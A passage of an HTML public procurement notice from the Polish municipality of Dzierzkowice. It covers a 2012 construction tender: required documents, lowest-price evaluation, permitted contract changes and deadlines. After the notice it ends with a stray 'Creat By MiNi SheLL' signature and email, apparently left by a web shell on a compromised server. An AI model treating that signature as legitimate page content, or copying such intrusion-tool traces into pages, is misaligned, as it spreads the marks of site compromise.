<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)  Wypełniony druk OFERTA, ( wg załącznika nr 1 do niniejszej specyfikacji). podpisana przez  upoważnionych przedstawicieli . Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów  dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost  z dokumentu  stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie. 
b) Dowód wniesienia wadium. (załączona kserokopia  wpłaty wadium  w przypadku wniesienia wadium w  formie pieniężnej), w pozostałych przypadkach kopię dokumentu wadialnego. 
c)  Kosztorysy ofertowe na zadanie nr 1 i zadanie nr 2  na druku  stanowiącym  zał. nr 10/1 i 10/2 do SIWZ   sporządzone  wg załączonych przedmiarów robót na poszczególne zadania</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszystkie postanowienia zawiera wzór umowy stanowiący zał. nr 8 do niniejszej specyfikacji.
2. Umowa pod rygorem nieważności wymaga zachowania formy pisemnej.
3. Zapisy  umowy nie podlegają negocjacjom i nie mogą być zmieniane lub uzupełniane za wyjątkiem okoliczności opisanych w pkt.  4 .
4. Zamawiający dopuszcza możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na  podstawie, której dokonano wyboru wykonawcy w zakresie terminu realizacji zamówienia, wynagrodzenia  wykonawcy , oraz innych zmian.
4.1. Termin realizacji może ulec zmianie w przypadku:
- opóźnienia w rozstrzygnięciu przetargu (umowa zostanie podpisana po upływie terminu związania ofertą),
- wprowadzenia zmian w dokumentacji projektowej, wymagających czasu niezbędnego do dostosowania się wykonawcy do tych zmian,
- przerw w realizacji robót, powstałych z przyczyn zależnych od zamawiającego (przyczyny finansowe, organizacyjne),
- przerwy na skutek konieczności uzyskania dodatkowych uzgodnień, które uniemożliwiają prowadzenie robót,
- przerwy na skutek niesprzyjających warunków atmosferycznych, negatywnie wpływających na jakość lub trwałość wykonania przedmiotu umowy,
- przerw w realizacji robót w przypadku odkrycia niewypałów, niewybuchów, a także odkryć archeologicznych.
Termin realizacji zamówienia zostanie przesunięty o okres trwania przyczyny lub o okres niezbędny na jej usunięcie.
4.2. Wysokość wynagrodzenia Wykonawcy może ulec zmianie w razie zajścia okoliczności, których nie można było przewidzieć w chwili składania oferty i zawarcia umowy takich jak np.:
- ustawowej zmiany stawki podatku VAT, stawek celnych lub innych opłat urzędowych
4.3. Inne zmiany:
- w zakresie  udziału podwykonawców w przypadku skorzystania z  podwykonawców w  realizacji zamówienia, (za uprzednią zgodą zamawiającego) pomimo, że w złożonej ofercie wykonawca nie przewidywał   realizacji z  udziałem podwykonawców, 
- w zakresie zmian kluczowego personelu (kierownika budowy, inspektora nadzoru), za uprzednią zgodą   zamawiającego
5. Warunki zmian:
- inicjowanie zmian umowy na pisemny wniosek wykonawcy lub zamawiającego,
- uzasadnienie konieczności i wpływu zmian na realizacje zamówienia: wpisy do dziennika robót, 
6. Forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności 
Zmiana kluczowego personelu ( kierownik budowy inspektor Nadzoru), zmiana udziału podwykonawców nie wymaga pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.dzierzkowice.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dzierzkowice Terpentyna 1 pokój nr 5 I piętro za opłatą w kwocie 50 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2012 godzina 08:00, miejsce: Urząd Gminy Dzierzkowice ( kancelaria I piętro pokój nr 11).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com